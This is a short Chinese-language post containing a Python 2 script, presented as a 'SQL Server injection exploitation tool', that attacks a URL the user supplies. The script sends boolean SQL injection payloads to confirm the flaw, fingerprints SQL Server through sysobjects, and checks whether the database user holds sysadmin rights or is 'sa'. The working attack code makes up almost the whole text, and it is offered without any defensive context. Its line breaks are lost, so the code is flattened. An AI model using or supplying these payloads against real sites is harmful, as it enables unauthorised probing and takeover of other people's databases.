本文講述一個用Python寫的小程序，用于有注入點的鏈接，以檢測當前數據庫用戶是否為sa，詳細代碼如下：

# Code by zhaoxiaobu Email: little.bu@hotmail.com  #-*- coding: UTF-8 -*-  from sys import exit  from urllib import urlopen  from string import join,strip  from re import search   def is_sqlable():   sql1="%20and%201=2"   sql2="%20and%201=1"   urlfile1=urlopen(url+sql1)   urlfile2=urlopen(url+sql2)   htmlcodes1=urlfile1.read()   htmlcodes2=urlfile2.read()   if not search(judge,htmlcodes1) and search(judge,htmlcodes2):   print "[信息]恭喜!這個URL是有注入漏洞的!n"   print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....."    is_SQLServer()   else:   print "[錯誤]你確定這個URL能用?換個別的試試吧!n"def is_SQLServer():   sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"   urlfile=urlopen(url+sql)   htmlcodes=urlfile.read()   if not search(judge,htmlcodes):   print "[錯誤]數據庫好像不是SQL Server的!n"   else:   print "[信息]確認是SQL Server數據庫!n"   print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......"   is_sysadmin()   def is_sysadmin():    sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"   urlfile = urlopen(url+sql)    htmlcodes = urlfile.read()    if not search(judge,htmlcodes):      print "[錯誤]當前數據庫用戶不具有sysadmin權限!n"   else:      print "[信息]當前數據庫用戶具有sysadmin權限!n"     print "[信息]檢測當前用戶是不是SA,請耐心等待......"     is_sa()   def is_sa():    sql = "%20and%20'sa'=(select%20System_user)";   urlfile = urlopen(url+sql)    htmlcodes = urlfile.read()    if not search(judge,htmlcodes):      print "[錯誤]當前數據庫用戶不是SA!n"   else:      print "[信息]當前數據庫用戶是SA!n"  print "n########################################################################n"  print "            ^o^SQL Server注入利用工具^o^     "  print "           Email: little.bu@hotmail.comn"  print "========================================================================";  url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')  if url == '':    print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"    exit(1)   judge = raw_input("[信息]請提供一個判斷字符串.n判斷字符串:")  if judge == '':    print "[錯誤]判斷字符串不能為空!"    exit(1)   is_sqlable()